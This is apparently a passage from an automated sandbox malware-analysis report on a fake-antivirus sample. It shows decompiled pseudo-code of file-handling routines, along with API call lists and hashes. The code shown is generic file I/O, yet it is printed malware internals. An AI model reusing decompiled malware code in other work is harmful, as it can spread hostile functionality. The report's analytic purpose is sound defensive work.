                                                                                                                                                  									_t104 = _t104 + 1;
                                                                                                                                                  									if(_t95 <  *((intOrPtr*)(_t125 + 4))) {
                                                                                                                                                  										continue;
                                                                                                                                                  									}
                                                                                                                                                  									goto L41;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							L41:
                                                                                                                                                  							 *((char*)(_t104 +  *_t125)) = 0;
                                                                                                                                                  							 *((intOrPtr*)(_t125 + 4)) = _t104;
                                                                                                                                                  						}
                                                                                                                                                  						goto L42;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t76 = E0040503B(_t95,  &_v4144);
                                                                                                                                                  					}
                                                                                                                                                  					L43:
                                                                                                                                                  				} else {
                                                                                                                                                  					GetModuleFileNameA(0,  &_v1040, 0x400);
                                                                                                                                                  					_t76 = E0040A3B2(_t97,  &_v1040, 0x5c);
                                                                                                                                                  					if(_t76 != 0) {
                                                                                                                                                  						_t66 = _t76 + 1;
                                                                                                                                                  						goto L4;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t76;
                                                                                                                                                  			}




























                                                                                                                                                  0x0040926c
                                                                                                                                                  0x0040926c
                                                                                                                                                  0x0040926c
                                                                                                                                                  0x00409274
                                                                                                                                                  0x00409278
                                                                                                                                                  0x0040927c
                                                                                                                                                  0x0040927f
                                                                                                                                                  0x00409281
                                                                                                                                                  0x00409288
                                                                                                                                                  0x0040928e
                                                                                                                                                  0x004092b5
                                                                                                                                                  0x004092b9
                                                                                                                                                  0x004092c5
                                                                                                                                                  0x004092dd
                                                                                                                                                  0x004092e4
                                                                                                                                                  0x004092f6
                                                                                                                                                  0x004092fa
                                                                                                                                                  0x004092fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004092fe
                                                                                                                                                  0x0040930e
                                                                                                                                                  0x00409313
                                                                                                                                                  0x00409328
                                                                                                                                                  0x0040932d
                                                                                                                                                  0x00409333
                                                                                                                                                  0x00409339
                                                                                                                                                  0x0040933b
                                                                                                                                                  0x0040933b
                                                                                                                                                  0x00409345
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040936c
                                                                                                                                                  0x00409397
                                                                                                                                                  0x0040939d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040939f
                                                                                                                                                  0x004093a9
                                                                                                                                                  0x004093be
                                                                                                                                                  0x004093c3
                                                                                                                                                  0x004093ca
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093d0
                                                                                                                                                  0x004093d4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093d4
                                                                                                                                                  0x004093ca
                                                                                                                                                  0x0040939d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040936c
                                                                                                                                                  0x004093a6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093a6
                                                                                                                                                  0x00409496
                                                                                                                                                  0x0040949c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004094a1
                                                                                                                                                  0x004093da
                                                                                                                                                  0x004093dd
                                                                                                                                                  0x004093de
                                                                                                                                                  0x004093e9
                                                                                                                                                  0x004093f0
                                                                                                                                                  0x004093fe
                                                                                                                                                  0x00409403
                                                                                                                                                  0x00409407
                                                                                                                                                  0x00409410
                                                                                                                                                  0x0040941e
                                                                                                                                                  0x00409423
                                                                                                                                                  0x00409427
                                                                                                                                                  0x0040942a
                                                                                                                                                  0x0040942c
                                                                                                                                                  0x0040942c
                                                                                                                                                  0x0040942e
                                                                                                                                                  0x00409432
                                                                                                                                                  0x00409435
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040943a
                                                                                                                                                  0x0040947a
                                                                                                                                                  0x00409483
                                                                                                                                                  0x00409483
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040943c
                                                                                                                                                  0x00409440
                                                                                                                                                  0x00409443
                                                                                                                                                  0x00409470
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409445
                                                                                                                                                  0x00409445
                                                                                                                                                  0x00409448
                                                                                                                                                  0x0040946a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040944a
                                                                                                                                                  0x0040944a
                                                                                                                                                  0x0040944d
                                                                                                                                                  0x00409464
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040944f
                                                                                                                                                  0x0040944f
                                                                                                                                                  0x00409452
                                                                                                                                                  0x0040945e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409454
                                                                                                                                                  0x00409456
                                                                                                                                                  0x00409484
                                                                                                                                                  0x00409484
                                                                                                                                                  0x00409458
                                                                                                                                                  0x00409458
                                                                                                                                                  0x00409474
                                                                                                                                                  0x00409474
                                                                                                                                                  0x00409474
                                                                                                                                                  0x00409456
                                                                                                                                                  0x00409452
                                                                                                                                                  0x0040944d
                                                                                                                                                  0x00409448
                                                                                                                                                  0x00409443
                                                                                                                                                  0x00409487
                                                                                                                                                  0x0040948b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040948b
                                                                                                                                                  0x0040942c
                                                                                                                                                  0x0040948d
                                                                                                                                                  0x0040948f
                                                                                                                                                  0x00409493
                                                                                                                                                  0x00409493
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004092e6
                                                                                                                                                  0x004092ec
                                                                                                                                                  0x004092ec
                                                                                                                                                  0x004094a2
                                                                                                                                                  0x00409290
                                                                                                                                                  0x00409298
                                                                                                                                                  0x004092a7
                                                                                                                                                  0x004092ae
                                                                                                                                                  0x004092b4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004092b4
                                                                                                                                                  0x004092ae
                                                                                                                                                  0x004094a5

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,0000005C,00414C88,?,004098C5,?,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,0040D489,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe), ref: 00409298
                                                                                                                                                    • Part of subcall function 00404FA3: SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7D3,?,?,00405524,?,?), ref: 00404FBA
                                                                                                                                                    • Part of subcall function 00404FA3: GetLastError.KERNEL32(?,0040A7D3,?,?,00405524,?,?), ref: 00404FC7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$ErrorLastModuleNamePointer
                                                                                                                                                  • String ID: *messages***$@$a
                                                                                                                                                  • API String ID: 1624790276-2848287086
                                                                                                                                                  • Opcode ID: 9128bb792a6e44f7114dff750ae89d401208f49af6b21b86e83fb33a0cb07741
                                                                                                                                                  • Instruction ID: c2091fff8c98c9158d4c6855c82bddaf78b5c49a36df1a17a4426aebc4a45ec3
                                                                                                                                                  • Opcode Fuzzy Hash: 9128bb792a6e44f7114dff750ae89d401208f49af6b21b86e83fb33a0cb07741
                                                                                                                                                  • Instruction Fuzzy Hash: 77612471904244AEEB31DF64CC84FAF7BA89B45304F1081BFE945B61E3CA788E46CB19
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1537 40505e-405072 1538 405074 1537->1538 1539 405078-405082 1537->1539 1538->1539 1540 405084 1539->1540 1541 40508b-405095 1539->1541 1540->1541 1542 405097 1541->1542 1543 40509e-4050b5 call 406e67 1541->1543 1542->1543 1546 4050d7-4050e5 CreateFileA 1543->1546 1547 4050b7-4050bc 1543->1547 1549 4050eb-4050f0 1546->1549 1547->1546 1548 4050be-4050c1 1547->1548 1548->1546 1552 4050c3-4050d5 CreateFileW 1548->1552 1550 4050f2-4050fb 1549->1550 1551 405107-40511a 1549->1551 1550->1551 1558 4050fd 1550->1558 1553 405169-405170 1551->1553 1554 40511c-405122 1551->1554 1552->1549 1556 405124-405133 call 40e40c 1554->1556 1557 405135-405137 1554->1557 1560 40513e-405144 1556->1560 1557->1560 1558->1551 1562 405151-40515a call 40e1e9 1560->1562 1563 405146-40514f call 40a450 1560->1563 1566 40515f-405164 call 404ece 1562->1566 1563->1566 1566->1553
                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                  			E0040505E(void* __ecx, CHAR* _a4, WCHAR* _a8, char _a12, char _a15, long _a16) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				void* _t41;
                                                                                                                                                  				void* _t44;
                                                                                                                                                  				WCHAR* _t51;
                                                                                                                                                  				long _t58;
                                                                                                                                                  				void* _t59;
                                                                                                                                                  				void* _t62;
                                                                                                                                                  
                                                                                                                                                  				_t55 = __ecx;
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_t62 = __ecx;
                                                                                                                                                  				 *((intOrPtr*)(__ecx + 0xc18)) = 0;
                                                                                                                                                  				if( *((intOrPtr*)(__ecx + 0x16)) != 0) {
                                                                                                                                                  					_a12 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				_v8 = 0x80000000;
                                                                                                                                                  				if(_a16 != 0) {
                                                                                                                                                  					_v8 = 0xc0000000;
                                                                                                                                                  				}
                                                                                                                                                  				_a16 = 1;
                                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                                  					_a16 = 3;
                                                                                                                                                  				}
                                                                                                                                                  				_t58 = (0 |  *((intOrPtr*)(_t62 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
                                                                                                                                                  				if(E00406E67() == 0) {
                                                                                                                                                  					L10:
                                                                                                                                                  					_t41 = CreateFileA(_a4, _v8, _a16, 0, 3, _t58, 0); // executed
                                                                                                                                                  				} else {
                                                                                                                                                  					_t51 = _a8;
                                                                                                                                                  					if(_t51 == 0 ||  *_t51 == 0) {
                                                                                                                                                  						goto L10;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t41 = CreateFileW(_t51, _v8, _a16, 0, 3, _t58, 0); // executed
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t59 = _t41;
                                                                                                                                                  				if(_t59 == 0xffffffff && GetLastError() == 2) {
                                                                                                                                                  					 *((intOrPtr*)(_t62 + 0xc18)) = 1;
                                                                                                                                                  				}
                                                                                                                                                  				_a15 = _t59 != 0xffffffff;
                                                                                                                                                  				 *((char*)(_t62 + 0x12)) = 0;
                                                                                                                                                  				 *((intOrPtr*)(_t62 + 0xc)) = 0;
                                                                                                                                                  				 *((char*)(_t62 + 0x10)) = 0;
                                                                                                                                                  				if(_a15 != 0) {
                                                                                                                                                  					 *(_t62 + 4) = _t59;
                                                                                                                                                  					if(_a8 == 0) {
                                                                                                                                                  						 *((short*)(_t62 + 0x418)) = 0;
                                                                                                                                                  					} else {
                                                                                                                                                  						E0040E40C(_t62 + 0x418, _a8);
                                                                                                                                                  					}
                                                                                                                                                  					_t44 = _t62 + 0x17;
                                                                                                                                                  					if(_a4 == 0) {
                                                                                                                                                  						E0040E1E9(_t55, _a8, _t44, 0x1000000);
                                                                                                                                                  					} else {
                                                                                                                                                  						E0040A450(_t44, _a4);
                                                                                                                                                  					}
                                                                                                                                                  					E00404ECE(_t62,  *(_t62 + 4));
                                                                                                                                                  				}
                                                                                                                                                  				return _a15;
                                                                                                                                                  			}










                                                                                                                                                  0x0040505e
                                                                                                                                                  0x00405061
                                                                                                                                                  0x00405064
                                                                                                                                                  0x00405069
                                                                                                                                                  0x00405072
                                                                                                                                                  0x00405074
                                                                                                                                                  0x00405074
                                                                                                                                                  0x00405078
                                                                                                                                                  0x00405082
                                                                                                                                                  0x00405084
                                                                                                                                                  0x00405084
                                                                                                                                                  0x0040508b
                                                                                                                                                  0x00405095
                                                                                                                                                  0x00405097
                                                                                                                                                  0x00405097
                                                                                                                                                  0x004050ac
                                                                                                                                                  0x004050b5
                                                                                                                                                  0x004050d7
                                                                                                                                                  0x004050e5
                                                                                                                                                  0x004050b7
                                                                                                                                                  0x004050b7
                                                                                                                                                  0x004050bc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004050c3
                                                                                                                                                  0x004050cf
                                                                                                                                                  0x004050cf
                                                                                                                                                  0x004050bc
                                                                                                                                                  0x004050eb
                                                                                                                                                  0x004050f0
                                                                                                                                                  0x004050fd
                                                                                                                                                  0x004050fd
                                                                                                                                                  0x0040510a
                                                                                                                                                  0x0040510e
                                                                                                                                                  0x00405111
                                                                                                                                                  0x00405114
                                                                                                                                                  0x0040511a
                                                                                                                                                  0x0040511c
                                                                                                                                                  0x00405122
                                                                                                                                                  0x00405137
                                                                                                                                                  0x00405124
                                                                                                                                                  0x0040512e
                                                                                                                                                  0x0040512e
                                                                                                                                                  0x0040513e
                                                                                                                                                  0x00405144
                                                                                                                                                  0x0040515a
                                                                                                                                                  0x00405146
                                                                                                                                                  0x0040514a
                                                                                                                                                  0x0040514a
                                                                                                                                                  0x00405164
                                                                                                                                                  0x00405164
                                                                                                                                                  0x00405170

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,-00000001,00000000,00000000,?,00000000,?,?,004092E2,?,00000000,00000001), ref: 004050CF
                                                                                                                                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,-00000001,00000000,00000000,?,00000000,?,?,004092E2,?,00000000,00000001), ref: 004050E5
                                                                                                                                                    • Part of subcall function 0040E1E9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,0040515F,?,?,01000000,?), ref: 0040E203
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,004092E2,?,00000000,00000001,00000000,00000000,?,?,?,0000005C,00414C88), ref: 004050F2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile$ByteCharErrorLastMultiWide
                                                                                                                                                  • String ID: @Mhv
                                                                                                                                                  • API String ID: 158210224-3595611156
                                                                                                                                                  • Opcode ID: 5a2fbc54e5daaccae5f8b923658c938948fd63ac06f06a9dd3b8363673405bad
                                                                                                                                                  • Instruction ID: bc4a3d4203c432f7c64f81e59d9b0129e7794b1fee3f8e9237a2fe64023df2e9
                                                                                                                                                  • Opcode Fuzzy Hash: 5a2fbc54e5daaccae5f8b923658c938948fd63ac06f06a9dd3b8363673405bad
                                                                                                                                                  • Instruction Fuzzy Hash: 7F31E071400B88AFDB218F60C844BDF7BA9EB01314F14893EF951AB281C7B99E549BA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1569 405299-4052aa 1570 4052ac-4052af 1569->1570 1571 4052bf-4052d6 ReadFile 1569->1571 1572 4052b1 1570->1572 1573 4052b4-4052bc GetStdHandle 1570->1573 1574 4052d8-4052e1 call 405018 1571->1574 1575 40530f 1571->1575 1572->1573 1573->1571 1579 4052e3-4052e6 1574->1579 1580 4052f5-4052f9 1574->1580 1576 405312-405315 1575->1576 1579->1580 1581 4052e8-4052f3 call 405299 1579->1581 1582 40530a-40530d 1580->1582 1583 4052fb-405304 1580->1583 1581->1576 1582->1576 1583->1582 1587 405306-405308 1583->1587 1587->1576
                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E00405299(void* __ecx, void* _a4, long _a8) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				int _t14;
                                                                                                                                                  				signed int _t15;
                                                                                                                                                  				long _t16;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_t22 = __ecx;
                                                                                                                                                  				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
                                                                                                                                                  					if(_a8 > 0x4e20) {
                                                                                                                                                  						_a8 = 0x4e20;
                                                                                                                                                  					}
                                                                                                                                                  					 *(_t22 + 4) = GetStdHandle(0xfffffff6);
                                                                                                                                                  				}
                                                                                                                                                  				_t14 = ReadFile( *(_t22 + 4), _a4, _a8,  &_v8, 0); // executed
                                                                                                                                                  				if(_t14 != 0) {
                                                                                                                                                  					_t15 = _v8;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t16 = E00405018(_t22);
                                                                                                                                                  					if(_t16 == 0 || _a8 <= 0x4e20) {
                                                                                                                                                  						if( *((intOrPtr*)(_t22 + 0xc)) != 1) {
                                                                                                                                                  							L11:
                                                                                                                                                  							_t15 = _t16 | 0xffffffff;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t16 = GetLastError();
                                                                                                                                                  							if(_t16 != 0x6d) {
                                                                                                                                                  								goto L11;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t15 = 0;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						_t15 = E00405299(_t22, _a4, 0x4e20);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t15;
                                                                                                                                                  			}








                                                                                                                                                  0x0040529c
                                                                                                                                                  0x0040529f
                                                                                                                                                  0x004052aa
                                                                                                                                                  0x004052af
                                                                                                                                                  0x004052b1
                                                                                                                                                  0x004052b1
                                                                                                                                                  0x004052bc
                                                                                                                                                  0x004052bc
                                                                                                                                                  0x004052ce
                                                                                                                                                  0x004052d6
                                                                                                                                                  0x0040530f
                                                                                                                                                  0x004052d8
                                                                                                                                                  0x004052da
                                                                                                                                                  0x004052e1
                                                                                                                                                  0x004052f9
                                                                                                                                                  0x0040530a
                                                                                                                                                  0x0040530a
                                                                                                                                                  0x004052fb
                                                                                                                                                  0x004052fb
                                                                                                                                                  0x00405304
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405306
                                                                                                                                                  0x00405306
                                                                                                                                                  0x00405306
                                                                                                                                                  0x00405304
                                                                                                                                                  0x004052e8
                                                                                                                                                  0x004052ee
                                                                                                                                                  0x004052ee
                                                                                                                                                  0x004052e1
                                                                                                                                                  0x00405315

                                                                                                                                                  APIs
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,00414C7C,?,?,00405686,000000FF,?,00000000,?,00000000), ref: 004052B6
                                                                                                                                                  • ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,?,00414C7C,?,?,00405686,000000FF,?,00000000,?,00000000), ref: 004052CE
                                                                                                                                                  • GetLastError.KERNEL32(?,00405686,000000FF,?,00000000,?,00000000), ref: 004052FB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileHandleLastRead
                                                                                                                                                  • String ID: @Mhv
                                                                                                                                                  • API String ID: 1699850967-3595611156
                                                                                                                                                  • Opcode ID: 423eb982c2c7c125813fa3b0acb62332a65a30c938369a6682ef3f3fa0f25a43
                                                                                                                                                  • Instruction ID: 2102482b96df2fad2395b01c3bf64a53081d4933113787b0af290282fe245b16
                                                                                                                                                  • Opcode Fuzzy Hash: 423eb982c2c7c125813fa3b0acb62332a65a30c938369a6682ef3f3fa0f25a43
                                                                                                                                                  • Instruction Fuzzy Hash: 59016131500A04FBCF20AF12D9044AF7B69EF413B0B00C17BF925A52D0C7788950EF99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                  			E00404FA3(void* __ecx, signed int __edx) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				long _t8;
                                                                                                                                                  				signed int _t11;
                                                                                                                                                  				signed int _t17;
                                                                                                                                                  				long _t20;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  
                                                                                                                                                  				_t17 = __edx;
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                  				_t23 = __ecx;
                                                                                                                                                  				_t8 = SetFilePointer( *(__ecx + 4), 0,  &_v8, 1); // executed
                                                                                                                                                  				_t20 = _t8;
                                                                                                                                                  				if(_t20 != 0xffffffff || GetLastError() == 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					asm("cdq");
                                                                                                                                                  					_t11 = E00401030(_v8, _t17, 0, 1) + _t20;
                                                                                                                                                  					asm("adc edx, ecx");
                                                                                                                                                  				} else {
                                                                                                                                                  					if( *((char*)(_t23 + 0x14)) == 0) {
                                                                                                                                                  						_t11 = _t17 | 0xffffffff;
                                                                                                                                                  					} else {
                                                                                                                                                  						E0040332E(0x414c7c, _t23 + 0x17);
                                                                                                                                                  						goto L4;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t11;
                                                                                                                                                  			}









                                                                                                                                                  0x00404fa3
                                                                                                                                                  0x00404fa6
                                                                                                                                                  0x00404fa7
                                                                                                                                                  0x00404fb3
                                                                                                                                                  0x00404fba
                                                                                                                                                  0x00404fc0
                                                                                                                                                  0x00404fc5
                                                                                                                                                  0x00404fe5
                                                                                                                                                  0x00404fea
                                                                                                                                                  0x00404ff6
                                                                                                                                                  0x00404ff8
                                                                                                                                                  0x00404fd1
                                                                                                                                                  0x00404fd5
                                                                                                                                                  0x00405001
                                                                                                                                                  0x00404fd7
                                                                                                                                                  0x00404fe0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404fe0
                                                                                                                                                  0x00404fd5
                                                                                                                                                  0x00404ffd

                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7D3,?,?,00405524,?,?), ref: 00404FBA
                                                                                                                                                  • GetLastError.KERNEL32(?,0040A7D3,?,?,00405524,?,?), ref: 00404FC7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                  • String ID: @Mhv$|LA
                                                                                                                                                  • API String ID: 2976181284-3573172535
                                                                                                                                                  • Opcode ID: 184dc8012a1ce1d9010cccb536a5defb8f39e0ea6c163ee1179f643669fae23a
                                                                                                                                                  • Instruction ID: c2820b33c8eafdce036db126d9e69f7ce15e24a47886ce0b202afd87eabc9474
                                                                                                                                                  • Opcode Fuzzy Hash: 184dc8012a1ce1d9010cccb536a5defb8f39e0ea6c163ee1179f643669fae23a
                                                                                                                                                  • Instruction Fuzzy Hash: 2EF0F6767402017BE724966A9D0BFDA36ADCBC0725F24423AB712E22D0DAB89D009268
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040585A(void* __eflags, CHAR* _a4, WCHAR* _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                  				void* _t6;
                                                                                                                                                  				int _t7;
                                                                                                                                                  				long _t8;
                                                                                                                                                  				void* _t9;
                                                                                                                                                  				WCHAR* _t14;
                                                                                                                                                  
                                                                                                                                                  				_t6 = E00406E67();
                                                                                                                                                  				_t14 = _a8;
                                                                                                                                                  				if(_t6 == 0 || _t14 == 0 ||  *_t14 == 0) {
                                                                                                                                                  					_t7 = CreateDirectoryA(_a4, 0); // executed
                                                                                                                                                  				} else {
                                                                                                                                                  					_t7 = CreateDirectoryW(_t14, 0);
                                                                                                                                                  				}
                                                                                                                                                  				if(_t7 == 0) {
                                                                                                                                                  					_t8 = GetLastError();
                                                                                                                                                  					__eflags = _t8 - 2;
                                                                                                                                                  					if(_t8 == 2) {
                                                                                                                                                  						L12:
                                                                                                                                                  						_t9 = 2;
                                                                                                                                                  						return _t9;
                                                                                                                                                  					}
                                                                                                                                                  					__eflags = _t8 - 3;
                                                                                                                                                  					if(_t8 == 3) {
                                                                                                                                                  						goto L12;
                                                                                                                                                  					}
                                                                                                                                                  					return 1;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t20 = _a12;
                                                                                                                                                  					if(_a12 != 0) {
                                                                                                                                                  						E004057AA(_t20, _a4, _t14, _a16);
                                                                                                                                                  					}
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  			}








                                                                                                                                                  0x0040585e
                                                                                                                                                  0x00405863
                                                                                                                                                  0x00405868
                                                                                                                                                  0x00405884
                                                                                                                                                  0x00405874
                                                                                                                                                  0x00405877
                                                                                                                                                  0x00405877
                                                                                                                                                  0x0040588c
                                                                                                                                                  0x004058a4
                                                                                                                                                  0x004058aa
                                                                                                                                                  0x004058ad
                                                                                                                                                  0x004058b9
                                                                                                                                                  0x004058bb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004058bb
                                                                                                                                                  0x004058af
                                                                                                                                                  0x004058b2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040588e
                                                                                                                                                  0x0040588e
                                                                                                                                                  0x00405892
                                                                                                                                                  0x0040589b
                                                                                                                                                  0x0040589b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004058a0

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000400,00000000,00000000,?,00405976,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 00405877
                                                                                                                                                  • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000,?,00405976,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 00405884
                                                                                                                                                  • GetLastError.KERNEL32(?,00405976,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 004058A4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
